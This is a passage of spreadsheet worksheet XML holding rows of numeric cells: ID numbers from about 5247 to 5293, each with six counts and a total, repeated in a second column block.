        <v>1</v>
      </c>
      <c r="D1333" s="8">
        <v>114</v>
      </c>
      <c r="E1333" s="8">
        <v>153</v>
      </c>
      <c r="F1333" s="8">
        <v>27</v>
      </c>
      <c r="G1333" s="8">
        <v>110</v>
      </c>
      <c r="H1333" s="8">
        <v>431</v>
      </c>
      <c r="K1333" s="7">
        <v>5247</v>
      </c>
      <c r="L1333" s="8">
        <v>26</v>
      </c>
      <c r="M1333" s="8">
        <v>1</v>
      </c>
      <c r="N1333" s="8">
        <v>114</v>
      </c>
      <c r="O1333" s="8">
        <v>153</v>
      </c>
      <c r="P1333" s="8">
        <v>27</v>
      </c>
      <c r="Q1333" s="8">
        <v>110</v>
      </c>
    </row>
    <row r="1334" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1334" s="7">
        <v>5249</v>
      </c>
      <c r="B1334" s="8">
        <v>6</v>
      </c>
      <c r="C1334" s="8">
        <v>1</v>
      </c>
      <c r="D1334" s="8">
        <v>12</v>
      </c>
      <c r="E1334" s="8">
        <v>0</v>
      </c>
      <c r="F1334" s="8">
        <v>2</v>
      </c>
      <c r="G1334" s="8">
        <v>2</v>
      </c>
      <c r="H1334" s="8">
        <v>23</v>
      </c>
      <c r="K1334" s="7">
        <v>5249</v>
      </c>
      <c r="L1334" s="8">
        <v>6</v>
      </c>
      <c r="M1334" s="8">
        <v>1</v>
      </c>
      <c r="N1334" s="8">
        <v>12</v>
      </c>
      <c r="O1334" s="8">
        <v>0</v>
      </c>
      <c r="P1334" s="8">
        <v>2</v>
      </c>
      <c r="Q1334" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1335" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1335" s="7">
        <v>5251</v>
      </c>
      <c r="B1335" s="8">
        <v>30</v>
      </c>
      <c r="C1335" s="8">
        <v>30</v>
      </c>
      <c r="D1335" s="8">
        <v>5</v>
      </c>
      <c r="E1335" s="8">
        <v>6</v>
      </c>
      <c r="F1335" s="8">
        <v>1</v>
      </c>
      <c r="G1335" s="8">
        <v>2</v>
      </c>
      <c r="H1335" s="8">
        <v>74</v>
      </c>
      <c r="K1335" s="7">
        <v>5251</v>
      </c>
      <c r="L1335" s="8">
        <v>30</v>
      </c>
      <c r="M1335" s="8">
        <v>30</v>
      </c>
      <c r="N1335" s="8">
        <v>5</v>
      </c>
      <c r="O1335" s="8">
        <v>6</v>
      </c>
      <c r="P1335" s="8">
        <v>1</v>
      </c>
      <c r="Q1335" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1336" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1336" s="7">
        <v>5252</v>
      </c>
      <c r="B1336" s="8">
        <v>20</v>
      </c>
      <c r="C1336" s="8">
        <v>1</v>
      </c>
      <c r="D1336" s="8">
        <v>38</v>
      </c>
      <c r="E1336" s="8">
        <v>219</v>
      </c>
      <c r="F1336" s="8">
        <v>43</v>
      </c>
      <c r="G1336" s="8">
        <v>48</v>
      </c>
      <c r="H1336" s="8">
        <v>369</v>
      </c>
      <c r="K1336" s="7">
        <v>5252</v>
      </c>
      <c r="L1336" s="8">
        <v>20</v>
      </c>
      <c r="M1336" s="8">
        <v>1</v>
      </c>
      <c r="N1336" s="8">
        <v>38</v>
      </c>
      <c r="O1336" s="8">
        <v>219</v>
      </c>
      <c r="P1336" s="8">
        <v>43</v>
      </c>
      <c r="Q1336" s="8">
        <v>48</v>
      </c>
    </row>
    <row r="1337" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1337" s="7">
        <v>5253</v>
      </c>
      <c r="B1337" s="8">
        <v>26</v>
      </c>
      <c r="C1337" s="8">
        <v>0</v>
      </c>
      <c r="D1337" s="8">
        <v>0</v>
      </c>
      <c r="E1337" s="8">
        <v>0</v>
      </c>
      <c r="F1337" s="8">
        <v>2</v>
      </c>
      <c r="G1337" s="8">
        <v>1</v>
      </c>
      <c r="H1337" s="8">
        <v>29</v>
      </c>
      <c r="K1337" s="7">
        <v>5253</v>
      </c>
      <c r="L1337" s="8">
        <v>26</v>
      </c>
      <c r="M1337" s="8">
        <v>0</v>
      </c>
      <c r="N1337" s="8">
        <v>0</v>
      </c>
      <c r="O1337" s="8">
        <v>0</v>
      </c>
      <c r="P1337" s="8">
        <v>2</v>
      </c>
      <c r="Q1337" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1338" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1338" s="7">
        <v>5254</v>
      </c>
      <c r="B1338" s="8">
        <v>25</v>
      </c>
      <c r="C1338" s="8">
        <v>2</v>
      </c>
      <c r="D1338" s="8">
        <v>0</v>
      </c>
      <c r="E1338" s="8">
        <v>0</v>
      </c>
      <c r="F1338" s="8">
        <v>22</v>
      </c>
      <c r="G1338" s="8">
        <v>9</v>
      </c>
      <c r="H1338" s="8">
        <v>58</v>
      </c>
      <c r="K1338" s="7">
        <v>5254</v>
      </c>
      <c r="L1338" s="8">
        <v>25</v>
      </c>
      <c r="M1338" s="8">
        <v>2</v>
      </c>
      <c r="N1338" s="8">
        <v>0</v>
      </c>
      <c r="O1338" s="8">
        <v>0</v>
      </c>
      <c r="P1338" s="8">
        <v>22</v>
      </c>
      <c r="Q1338" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="1339" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1339" s="7">
        <v>5255</v>
      </c>
      <c r="B1339" s="8">
        <v>0</v>
      </c>
      <c r="C1339" s="8">
        <v>0</v>
      </c>
      <c r="D1339" s="8">
        <v>3</v>
      </c>
      <c r="E1339" s="8">
        <v>2</v>
      </c>
      <c r="F1339" s="8">
        <v>4</v>
      </c>
      <c r="G1339" s="8">
        <v>1</v>
      </c>
      <c r="H1339" s="8">
        <v>10</v>
      </c>
      <c r="K1339" s="7">
        <v>5255</v>
      </c>
      <c r="L1339" s="8">
        <v>0</v>
      </c>
      <c r="M1339" s="8">
        <v>0</v>
      </c>
      <c r="N1339" s="8">
        <v>3</v>
      </c>
      <c r="O1339" s="8">
        <v>2</v>
      </c>
      <c r="P1339" s="8">
        <v>4</v>
      </c>
      <c r="Q1339" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1340" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1340" s="7">
        <v>5256</v>
      </c>
      <c r="B1340" s="8">
        <v>6</v>
      </c>
      <c r="C1340" s="8">
        <v>2</v>
      </c>
      <c r="D1340" s="8">
        <v>47</v>
      </c>
      <c r="E1340" s="8">
        <v>7</v>
      </c>
      <c r="F1340" s="8">
        <v>3</v>
      </c>
      <c r="G1340" s="8">
        <v>18</v>
      </c>
      <c r="H1340" s="8">
        <v>83</v>
      </c>
      <c r="K1340" s="7">
        <v>5256</v>
      </c>
      <c r="L1340" s="8">
        <v>6</v>
      </c>
      <c r="M1340" s="8">
        <v>2</v>
      </c>
      <c r="N1340" s="8">
        <v>47</v>
      </c>
      <c r="O1340" s="8">
        <v>7</v>
      </c>
      <c r="P1340" s="8">
        <v>3</v>
      </c>
      <c r="Q1340" s="8">
        <v>18</v>
      </c>
    </row>
    <row r="1341" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1341" s="7">
        <v>5257</v>
      </c>
      <c r="B1341" s="8">
        <v>0</v>
      </c>
      <c r="C1341" s="8">
        <v>0</v>
      </c>
      <c r="D1341" s="8">
        <v>0</v>
      </c>
      <c r="E1341" s="8">
        <v>0</v>
      </c>
      <c r="F1341" s="8">
        <v>2</v>
      </c>
      <c r="G1341" s="8">
        <v>2</v>
      </c>
      <c r="H1341" s="8">
        <v>4</v>
      </c>
      <c r="K1341" s="7">
        <v>5257</v>
      </c>
      <c r="L1341" s="8">
        <v>0</v>
      </c>
      <c r="M1341" s="8">
        <v>0</v>
      </c>
      <c r="N1341" s="8">
        <v>0</v>
      </c>
      <c r="O1341" s="8">
        <v>0</v>
      </c>
      <c r="P1341" s="8">
        <v>2</v>
      </c>
      <c r="Q1341" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1342" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1342" s="7">
        <v>5258</v>
      </c>
      <c r="B1342" s="8">
        <v>30</v>
      </c>
      <c r="C1342" s="8">
        <v>3</v>
      </c>
      <c r="D1342" s="8">
        <v>68</v>
      </c>
      <c r="E1342" s="8">
        <v>269</v>
      </c>
      <c r="F1342" s="8">
        <v>0</v>
      </c>
      <c r="G1342" s="8">
        <v>0</v>
      </c>
      <c r="H1342" s="8">
        <v>370</v>
      </c>
      <c r="K1342" s="7">
        <v>5258</v>
      </c>
      <c r="L1342" s="8">
        <v>30</v>
      </c>
      <c r="M1342" s="8">
        <v>3</v>
      </c>
      <c r="N1342" s="8">
        <v>68</v>
      </c>
      <c r="O1342" s="8">
        <v>269</v>
      </c>
      <c r="P1342" s="8">
        <v>0</v>
      </c>
      <c r="Q1342" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1343" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1343" s="7">
        <v>5259</v>
      </c>
      <c r="B1343" s="8">
        <v>26</v>
      </c>
      <c r="C1343" s="8">
        <v>2</v>
      </c>
      <c r="D1343" s="8">
        <v>0</v>
      </c>
      <c r="E1343" s="8">
        <v>0</v>
      </c>
      <c r="F1343" s="8">
        <v>15</v>
      </c>
      <c r="G1343" s="8">
        <v>2</v>
      </c>
      <c r="H1343" s="8">
        <v>45</v>
      </c>
      <c r="K1343" s="7">
        <v>5259</v>
      </c>
      <c r="L1343" s="8">
        <v>26</v>
      </c>
      <c r="M1343" s="8">
        <v>2</v>
      </c>
      <c r="N1343" s="8">
        <v>0</v>
      </c>
      <c r="O1343" s="8">
        <v>0</v>
      </c>
      <c r="P1343" s="8">
        <v>15</v>
      </c>
      <c r="Q1343" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1344" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1344" s="7">
        <v>5261</v>
      </c>
      <c r="B1344" s="8">
        <v>20</v>
      </c>
      <c r="C1344" s="8">
        <v>0</v>
      </c>
      <c r="D1344" s="8">
        <v>3</v>
      </c>
      <c r="E1344" s="8">
        <v>1</v>
      </c>
      <c r="F1344" s="8">
        <v>1</v>
      </c>
      <c r="G1344" s="8">
        <v>1</v>
      </c>
      <c r="H1344" s="8">
        <v>26</v>
      </c>
      <c r="K1344" s="7">
        <v>5261</v>
      </c>
      <c r="L1344" s="8">
        <v>20</v>
      </c>
      <c r="M1344" s="8">
        <v>0</v>
      </c>
      <c r="N1344" s="8">
        <v>3</v>
      </c>
      <c r="O1344" s="8">
        <v>1</v>
      </c>
      <c r="P1344" s="8">
        <v>1</v>
      </c>
      <c r="Q1344" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1345" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1345" s="7">
        <v>5262</v>
      </c>
      <c r="B1345" s="8">
        <v>26</v>
      </c>
      <c r="C1345" s="8">
        <v>1</v>
      </c>
      <c r="D1345" s="8">
        <v>1</v>
      </c>
      <c r="E1345" s="8">
        <v>2</v>
      </c>
      <c r="F1345" s="8">
        <v>6</v>
      </c>
      <c r="G1345" s="8">
        <v>5</v>
      </c>
      <c r="H1345" s="8">
        <v>41</v>
      </c>
      <c r="K1345" s="7">
        <v>5262</v>
      </c>
      <c r="L1345" s="8">
        <v>26</v>
      </c>
      <c r="M1345" s="8">
        <v>1</v>
      </c>
      <c r="N1345" s="8">
        <v>1</v>
      </c>
      <c r="O1345" s="8">
        <v>2</v>
      </c>
      <c r="P1345" s="8">
        <v>6</v>
      </c>
      <c r="Q1345" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1346" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1346" s="7">
        <v>5263</v>
      </c>
      <c r="B1346" s="8">
        <v>15</v>
      </c>
      <c r="C1346" s="8">
        <v>0</v>
      </c>
      <c r="D1346" s="8">
        <v>0</v>
      </c>
      <c r="E1346" s="8">
        <v>0</v>
      </c>
      <c r="F1346" s="8">
        <v>10</v>
      </c>
      <c r="G1346" s="8">
        <v>3</v>
      </c>
      <c r="H1346" s="8">
        <v>28</v>
      </c>
      <c r="K1346" s="7">
        <v>5263</v>
      </c>
      <c r="L1346" s="8">
        <v>15</v>
      </c>
      <c r="M1346" s="8">
        <v>0</v>
      </c>
      <c r="N1346" s="8">
        <v>0</v>
      </c>
      <c r="O1346" s="8">
        <v>0</v>
      </c>
      <c r="P1346" s="8">
        <v>10</v>
      </c>
      <c r="Q1346" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1347" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1347" s="7">
        <v>5267</v>
      </c>
      <c r="B1347" s="8">
        <v>25</v>
      </c>
      <c r="C1347" s="8">
        <v>1</v>
      </c>
      <c r="D1347" s="8">
        <v>3</v>
      </c>
      <c r="E1347" s="8">
        <v>3</v>
      </c>
      <c r="F1347" s="8">
        <v>2</v>
      </c>
      <c r="G1347" s="8">
        <v>1</v>
      </c>
      <c r="H1347" s="8">
        <v>35</v>
      </c>
      <c r="K1347" s="7">
        <v>5267</v>
      </c>
      <c r="L1347" s="8">
        <v>25</v>
      </c>
      <c r="M1347" s="8">
        <v>1</v>
      </c>
      <c r="N1347" s="8">
        <v>3</v>
      </c>
      <c r="O1347" s="8">
        <v>3</v>
      </c>
      <c r="P1347" s="8">
        <v>2</v>
      </c>
      <c r="Q1347" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1348" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1348" s="7">
        <v>5269</v>
      </c>
      <c r="B1348" s="8">
        <v>26</v>
      </c>
      <c r="C1348" s="8">
        <v>0</v>
      </c>
      <c r="D1348" s="8">
        <v>16</v>
      </c>
      <c r="E1348" s="8">
        <v>24</v>
      </c>
      <c r="F1348" s="8">
        <v>0</v>
      </c>
      <c r="G1348" s="8">
        <v>0</v>
      </c>
      <c r="H1348" s="8">
        <v>66</v>
      </c>
      <c r="K1348" s="7">
        <v>5269</v>
      </c>
      <c r="L1348" s="8">
        <v>26</v>
      </c>
      <c r="M1348" s="8">
        <v>0</v>
      </c>
      <c r="N1348" s="8">
        <v>16</v>
      </c>
      <c r="O1348" s="8">
        <v>24</v>
      </c>
      <c r="P1348" s="8">
        <v>0</v>
      </c>
      <c r="Q1348" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1349" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1349" s="7">
        <v>5270</v>
      </c>
      <c r="B1349" s="8">
        <v>25</v>
      </c>
      <c r="C1349" s="8">
        <v>1</v>
      </c>
      <c r="D1349" s="8">
        <v>86</v>
      </c>
      <c r="E1349" s="8">
        <v>369</v>
      </c>
      <c r="F1349" s="8">
        <v>19</v>
      </c>
      <c r="G1349" s="8">
        <v>10</v>
      </c>
      <c r="H1349" s="8">
        <v>510</v>
      </c>
      <c r="K1349" s="7">
        <v>5270</v>
      </c>
      <c r="L1349" s="8">
        <v>25</v>
      </c>
      <c r="M1349" s="8">
        <v>1</v>
      </c>
      <c r="N1349" s="8">
        <v>86</v>
      </c>
      <c r="O1349" s="8">
        <v>369</v>
      </c>
      <c r="P1349" s="8">
        <v>19</v>
      </c>
      <c r="Q1349" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="1350" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1350" s="7">
        <v>5272</v>
      </c>
      <c r="B1350" s="8">
        <v>6</v>
      </c>
      <c r="C1350" s="8">
        <v>5</v>
      </c>
      <c r="D1350" s="8">
        <v>1</v>
      </c>
      <c r="E1350" s="8">
        <v>3</v>
      </c>
      <c r="F1350" s="8">
        <v>2</v>
      </c>
      <c r="G1350" s="8">
        <v>3</v>
      </c>
      <c r="H1350" s="8">
        <v>20</v>
      </c>
      <c r="K1350" s="7">
        <v>5272</v>
      </c>
      <c r="L1350" s="8">
        <v>6</v>
      </c>
      <c r="M1350" s="8">
        <v>5</v>
      </c>
      <c r="N1350" s="8">
        <v>1</v>
      </c>
      <c r="O1350" s="8">
        <v>3</v>
      </c>
      <c r="P1350" s="8">
        <v>2</v>
      </c>
      <c r="Q1350" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1351" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1351" s="7">
        <v>5273</v>
      </c>
      <c r="B1351" s="8">
        <v>6</v>
      </c>
      <c r="C1351" s="8">
        <v>0</v>
      </c>
      <c r="D1351" s="8">
        <v>4</v>
      </c>
      <c r="E1351" s="8">
        <v>4</v>
      </c>
      <c r="F1351" s="8">
        <v>6</v>
      </c>
      <c r="G1351" s="8">
        <v>6</v>
      </c>
      <c r="H1351" s="8">
        <v>26</v>
      </c>
      <c r="K1351" s="7">
        <v>5273</v>
      </c>
      <c r="L1351" s="8">
        <v>6</v>
      </c>
      <c r="M1351" s="8">
        <v>0</v>
      </c>
      <c r="N1351" s="8">
        <v>4</v>
      </c>
      <c r="O1351" s="8">
        <v>4</v>
      </c>
      <c r="P1351" s="8">
        <v>6</v>
      </c>
      <c r="Q1351" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1352" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1352" s="7">
        <v>5274</v>
      </c>
      <c r="B1352" s="8">
        <v>20</v>
      </c>
      <c r="C1352" s="8">
        <v>20</v>
      </c>
      <c r="D1352" s="8">
        <v>1</v>
      </c>
      <c r="E1352" s="8">
        <v>2</v>
      </c>
      <c r="F1352" s="8">
        <v>2</v>
      </c>
      <c r="G1352" s="8">
        <v>4</v>
      </c>
      <c r="H1352" s="8">
        <v>49</v>
      </c>
      <c r="K1352" s="7">
        <v>5274</v>
      </c>
      <c r="L1352" s="8">
        <v>20</v>
      </c>
      <c r="M1352" s="8">
        <v>20</v>
      </c>
      <c r="N1352" s="8">
        <v>1</v>
      </c>
      <c r="O1352" s="8">
        <v>2</v>
      </c>
      <c r="P1352" s="8">
        <v>2</v>
      </c>
      <c r="Q1352" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1353" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1353" s="7">
        <v>5275</v>
      </c>
      <c r="B1353" s="8">
        <v>6</v>
      </c>
      <c r="C1353" s="8">
        <v>5</v>
      </c>
      <c r="D1353" s="8">
        <v>0</v>
      </c>
      <c r="E1353" s="8">
        <v>0</v>
      </c>
      <c r="F1353" s="8">
        <v>2</v>
      </c>
      <c r="G1353" s="8">
        <v>4</v>
      </c>
      <c r="H1353" s="8">
        <v>17</v>
      </c>
      <c r="K1353" s="7">
        <v>5275</v>
      </c>
      <c r="L1353" s="8">
        <v>6</v>
      </c>
      <c r="M1353" s="8">
        <v>5</v>
      </c>
      <c r="N1353" s="8">
        <v>0</v>
      </c>
      <c r="O1353" s="8">
        <v>0</v>
      </c>
      <c r="P1353" s="8">
        <v>2</v>
      </c>
      <c r="Q1353" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1354" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1354" s="7">
        <v>5276</v>
      </c>
      <c r="B1354" s="8">
        <v>3</v>
      </c>
      <c r="C1354" s="8">
        <v>5</v>
      </c>
      <c r="D1354" s="8">
        <v>2</v>
      </c>
      <c r="E1354" s="8">
        <v>1</v>
      </c>
      <c r="F1354" s="8">
        <v>1</v>
      </c>
      <c r="G1354" s="8">
        <v>1</v>
      </c>
      <c r="H1354" s="8">
        <v>13</v>
      </c>
      <c r="K1354" s="7">
        <v>5276</v>
      </c>
      <c r="L1354" s="8">
        <v>3</v>
      </c>
      <c r="M1354" s="8">
        <v>5</v>
      </c>
      <c r="N1354" s="8">
        <v>2</v>
      </c>
      <c r="O1354" s="8">
        <v>1</v>
      </c>
      <c r="P1354" s="8">
        <v>1</v>
      </c>
      <c r="Q1354" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1355" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1355" s="7">
        <v>5278</v>
      </c>
      <c r="B1355" s="8">
        <v>24</v>
      </c>
      <c r="C1355" s="8">
        <v>1</v>
      </c>
      <c r="D1355" s="8">
        <v>0</v>
      </c>
      <c r="E1355" s="8">
        <v>0</v>
      </c>
      <c r="F1355" s="8">
        <v>2</v>
      </c>
      <c r="G1355" s="8">
        <v>7</v>
      </c>
      <c r="H1355" s="8">
        <v>34</v>
      </c>
      <c r="K1355" s="7">
        <v>5278</v>
      </c>
      <c r="L1355" s="8">
        <v>24</v>
      </c>
      <c r="M1355" s="8">
        <v>1</v>
      </c>
      <c r="N1355" s="8">
        <v>0</v>
      </c>
      <c r="O1355" s="8">
        <v>0</v>
      </c>
      <c r="P1355" s="8">
        <v>2</v>
      </c>
      <c r="Q1355" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="1356" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1356" s="7">
        <v>5279</v>
      </c>
      <c r="B1356" s="8">
        <v>20</v>
      </c>
      <c r="C1356" s="8">
        <v>0</v>
      </c>
      <c r="D1356" s="8">
        <v>0</v>
      </c>
      <c r="E1356" s="8">
        <v>0</v>
      </c>
      <c r="F1356" s="8">
        <v>9</v>
      </c>
      <c r="G1356" s="8">
        <v>5</v>
      </c>
      <c r="H1356" s="8">
        <v>34</v>
      </c>
      <c r="K1356" s="7">
        <v>5279</v>
      </c>
      <c r="L1356" s="8">
        <v>20</v>
      </c>
      <c r="M1356" s="8">
        <v>0</v>
      </c>
      <c r="N1356" s="8">
        <v>0</v>
      </c>
      <c r="O1356" s="8">
        <v>0</v>
      </c>
      <c r="P1356" s="8">
        <v>9</v>
      </c>
      <c r="Q1356" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1357" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1357" s="7">
        <v>5280</v>
      </c>
      <c r="B1357" s="8">
        <v>20</v>
      </c>
      <c r="C1357" s="8">
        <v>0</v>
      </c>
      <c r="D1357" s="8">
        <v>2</v>
      </c>
      <c r="E1357" s="8">
        <v>0</v>
      </c>
      <c r="F1357" s="8">
        <v>2</v>
      </c>
      <c r="G1357" s="8">
        <v>2</v>
      </c>
      <c r="H1357" s="8">
        <v>26</v>
      </c>
      <c r="K1357" s="7">
        <v>5280</v>
      </c>
      <c r="L1357" s="8">
        <v>20</v>
      </c>
      <c r="M1357" s="8">
        <v>0</v>
      </c>
      <c r="N1357" s="8">
        <v>2</v>
      </c>
      <c r="O1357" s="8">
        <v>0</v>
      </c>
      <c r="P1357" s="8">
        <v>2</v>
      </c>
      <c r="Q1357" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1358" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1358" s="7">
        <v>5281</v>
      </c>
      <c r="B1358" s="8">
        <v>24</v>
      </c>
      <c r="C1358" s="8">
        <v>1</v>
      </c>
      <c r="D1358" s="8">
        <v>4</v>
      </c>
      <c r="E1358" s="8">
        <v>0</v>
      </c>
      <c r="F1358" s="8">
        <v>3</v>
      </c>
      <c r="G1358" s="8">
        <v>1</v>
      </c>
      <c r="H1358" s="8">
        <v>33</v>
      </c>
      <c r="K1358" s="7">
        <v>5281</v>
      </c>
      <c r="L1358" s="8">
        <v>24</v>
      </c>
      <c r="M1358" s="8">
        <v>1</v>
      </c>
      <c r="N1358" s="8">
        <v>4</v>
      </c>
      <c r="O1358" s="8">
        <v>0</v>
      </c>
      <c r="P1358" s="8">
        <v>3</v>
      </c>
      <c r="Q1358" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1359" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1359" s="7">
        <v>5282</v>
      </c>
      <c r="B1359" s="8">
        <v>5</v>
      </c>
      <c r="C1359" s="8">
        <v>2</v>
      </c>
      <c r="D1359" s="8">
        <v>30</v>
      </c>
      <c r="E1359" s="8">
        <v>0</v>
      </c>
      <c r="F1359" s="8">
        <v>89</v>
      </c>
      <c r="G1359" s="8">
        <v>7</v>
      </c>
      <c r="H1359" s="8">
        <v>133</v>
      </c>
      <c r="K1359" s="7">
        <v>5282</v>
      </c>
      <c r="L1359" s="8">
        <v>5</v>
      </c>
      <c r="M1359" s="8">
        <v>2</v>
      </c>
      <c r="N1359" s="8">
        <v>30</v>
      </c>
      <c r="O1359" s="8">
        <v>0</v>
      </c>
      <c r="P1359" s="8">
        <v>89</v>
      </c>
      <c r="Q1359" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="1360" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1360" s="7">
        <v>5283</v>
      </c>
      <c r="B1360" s="8">
        <v>24</v>
      </c>
      <c r="C1360" s="8">
        <v>3</v>
      </c>
      <c r="D1360" s="8">
        <v>0</v>
      </c>
      <c r="E1360" s="8">
        <v>0</v>
      </c>
      <c r="F1360" s="8">
        <v>1</v>
      </c>
      <c r="G1360" s="8">
        <v>3</v>
      </c>
      <c r="H1360" s="8">
        <v>31</v>
      </c>
      <c r="K1360" s="7">
        <v>5283</v>
      </c>
      <c r="L1360" s="8">
        <v>24</v>
      </c>
      <c r="M1360" s="8">
        <v>3</v>
      </c>
      <c r="N1360" s="8">
        <v>0</v>
      </c>
      <c r="O1360" s="8">
        <v>0</v>
      </c>
      <c r="P1360" s="8">
        <v>1</v>
      </c>
      <c r="Q1360" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1361" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1361" s="7">
        <v>5284</v>
      </c>
      <c r="B1361" s="8">
        <v>11</v>
      </c>
      <c r="C1361" s="8">
        <v>1</v>
      </c>
      <c r="D1361" s="8">
        <v>4</v>
      </c>
      <c r="E1361" s="8">
        <v>0</v>
      </c>
      <c r="F1361" s="8">
        <v>0</v>
      </c>
      <c r="G1361" s="8">
        <v>1</v>
      </c>
      <c r="H1361" s="8">
        <v>17</v>
      </c>
      <c r="K1361" s="7">
        <v>5284</v>
      </c>
      <c r="L1361" s="8">
        <v>11</v>
      </c>
      <c r="M1361" s="8">
        <v>1</v>
      </c>
      <c r="N1361" s="8">
        <v>4</v>
      </c>
      <c r="O1361" s="8">
        <v>0</v>
      </c>
      <c r="P1361" s="8">
        <v>0</v>
      </c>
      <c r="Q1361" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1362" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1362" s="7">
        <v>5288</v>
      </c>
      <c r="B1362" s="8">
        <v>0</v>
      </c>
      <c r="C1362" s="8">
        <v>0</v>
      </c>
      <c r="D1362" s="8">
        <v>59</v>
      </c>
      <c r="E1362" s="8">
        <v>57</v>
      </c>
      <c r="F1362" s="8">
        <v>15</v>
      </c>
      <c r="G1362" s="8">
        <v>8</v>
      </c>
      <c r="H1362" s="8">
        <v>139</v>
      </c>
      <c r="K1362" s="7">
        <v>5288</v>
      </c>
      <c r="L1362" s="8">
        <v>0</v>
      </c>
      <c r="M1362" s="8">
        <v>0</v>
      </c>
      <c r="N1362" s="8">
        <v>59</v>
      </c>
      <c r="O1362" s="8">
        <v>57</v>
      </c>
      <c r="P1362" s="8">
        <v>15</v>
      </c>
      <c r="Q1362" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="1363" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1363" s="7">
        <v>5290</v>
      </c>
      <c r="B1363" s="8">
        <v>24</v>
      </c>
      <c r="C1363" s="8">
        <v>0</v>
      </c>
      <c r="D1363" s="8">
        <v>12</v>
      </c>
      <c r="E1363" s="8">
        <v>3</v>
      </c>
      <c r="F1363" s="8">
        <v>1</v>
      </c>
      <c r="G1363" s="8">
        <v>1</v>
      </c>
      <c r="H1363" s="8">
        <v>41</v>
      </c>
      <c r="K1363" s="7">
        <v>5290</v>
      </c>
      <c r="L1363" s="8">
        <v>24</v>
      </c>
      <c r="M1363" s="8">
        <v>0</v>
      </c>
      <c r="N1363" s="8">
        <v>12</v>
      </c>
      <c r="O1363" s="8">
        <v>3</v>
      </c>
      <c r="P1363" s="8">
        <v>1</v>
      </c>
      <c r="Q1363" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1364" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1364" s="7">
        <v>5291</v>
      </c>
      <c r="B1364" s="8">
        <v>0</v>
      </c>
      <c r="C1364" s="8">
        <v>0</v>
      </c>
      <c r="D1364" s="8">
        <v>0</v>
      </c>
      <c r="E1364" s="8">
        <v>0</v>
      </c>
      <c r="F1364" s="8">
        <v>17</v>
      </c>
      <c r="G1364" s="8">
        <v>12</v>
      </c>
      <c r="H1364" s="8">
        <v>29</v>
      </c>
      <c r="K1364" s="7">
        <v>5291</v>
      </c>
      <c r="L1364" s="8">
        <v>0</v>
      </c>
      <c r="M1364" s="8">
        <v>0</v>
      </c>
      <c r="N1364" s="8">
        <v>0</v>
      </c>
      <c r="O1364" s="8">
        <v>0</v>
      </c>
      <c r="P1364" s="8">
        <v>17</v>
      </c>
      <c r="Q1364" s="8">
        <v>12</v>
      </c>
    </row>
    <row r="1365" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1365" s="7">
        <v>5293</v>
      </c>
      <c r="B1365" s="8">
        <v>26</v>
      </c>
      <c r="C1365" s="8">
        <v>1</v>
      </c>
      <c r="D1365" s="8">
        <v>20</v>
      </c>
      <c r="E1365" s="8">
        <v>80</v>
      </c>
      <c r="F1365" s="8">
        <v>14</v>
      </c>
      <c r="G1365" s="8">
        <v>2</v>
      </c>
      <c r="H1365" s="8">
        <v>143</v>
      </c>
      <c r="K1365" s="7">
        <v>5293</v>
      </c>
      <c r="L1365" s="8">
        <v>26</v>
      </c>
      <c r="M1365" s="8">
        <v>1</v>
      </c>
      <c r="N1365" s="8">
        <v>20</v>
      </c>
      <c r="O1365" s="8">
        <v>80</v>
      </c>
      <c r="P1365" s="8">
